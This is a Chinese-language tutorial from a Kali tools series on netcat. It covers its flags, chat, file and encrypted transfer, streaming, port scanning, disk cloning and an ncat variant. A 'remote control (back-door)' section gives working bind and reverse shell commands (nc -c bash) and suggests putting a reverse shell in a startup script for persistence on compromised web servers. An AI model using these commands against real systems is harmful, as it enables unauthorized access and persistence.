Kali系列--网络军刀NC！

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

the quieter you become,the more you can hear

NetCat在网络安全届的知名度也是十分的高，是大家普遍认可的 "瑞士军刀"。它是一个跨平台的工具，功能十分强大！

下面就让我来给大家介绍一下！

0

参数解析

-v 显示详细连接输出内容（和大多数工具一样）

-n 不做Dns解析（因为让nc去解析域名非常慢，所以一般都直接写ip）

-l 启动监听（listen）

-p 指定端口（port）

-q num 完成后num秒断开连接

-c 反弹一个shell（可以作为后门）

1

聊天

主机A(10.10.45.172) ：nc -lp 8888

主机B(10.10.45.168) ：nc -nv 10.10.45.172 8888

此时就可以建立一个连接，进行畅快地聊天啦！

2

传递目录内容

3

获取文件内容

4

传递文件

演示传输文件

A: nc -lp 8888 > 接收视频.mp4

B: nc -nv 10.10.45.172 8888 < 发送视频.mp4 -q 1

或者反过来

5

加密文件传输

以上我们说的各种功能都是在不加密的情况下做的，可以被嗅探到明文，所以我们可以配合其他软件实现加密功能

首先安装mcrypt ： apt-get install mcrypt

A: nc -lp 4444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 10.10.45.172 4444 -q 1

6

流媒体服务

A: cat 1.mp4 | nc -lp 8888

B: nc -nv 10.10.45.172 8888 | mplayer -vo x11 -cache 3000 -

不过一般我们也用不到这种传输，毕竟网速不见得跟得上

7

端口扫描

这是一个主动的端口扫描（目标IP： 10.10.45.172）

TCP ：

nc -nvz 10.10.45.172 1-65535

UDP :

nc -vnzu 10.10.45.172 1-65535

可以看出目标开放了22端口

8

远程克隆硬盘

在计算机取证中，原则上是不允许直接操作被入侵的硬盘的， 防止证据不完整。在韩剧《幽灵》中就有相关的情节，一般都 使用专业的设备将硬盘完整的复制过来，这种复制是把扇区信 息都复制过来，所以相当于一个同样的硬盘！

A: nc -lp 8888 | dd of=/dev/sda

B: dd if=/dev/sda | nc -nv 10.10.45.172 8888 -q 1

9

远程控制（back-door）

我相信这个才是最吸引大家的！

正向：

A: nc -lp 8888 -c bash

B: nc -nv 10.10.45.172 8888

之后就可以在B端执行bash命令了,而执行结果会在A端产生

反向：

A: nc -lp 8888

B: nc -nv 10.10.45.168 8888 -c bash

这样A端就可以执行B端的shell了。

其实反向更适合web渗透中的权限维持，因为在服务器一般会放置在IDC机房，防火墙一般会禁止服务器开放陌生端口，也会阻止外界对于服务器陌生端口连接。

而反向的思路是在我们的主机上开放端口，之后把连接我们服务器做成一个启动运行脚本，之后他就会主动连接我们了

####

注意： 在windows中把bash改成cmd

####

10

模拟Web浏览器

11

NC变体

一直被模仿，从未被超越！

NC也有大量的变体

NC在数据传输时用的是明文传输，并且端口一直开着就会导致别人也可以进行链接

ncat解决了这个问题

ncat是nmap组件包中的组件

A : ncat -c bash --allow 10.10.45.168 -vnl 8888 --ssl

这条语句的意思是只允许10.10.45.168这个IP来进行连接，开放并监听8888端口，使用ssl加密

B: ncat -nv 10.10.45.172 8888 --ssl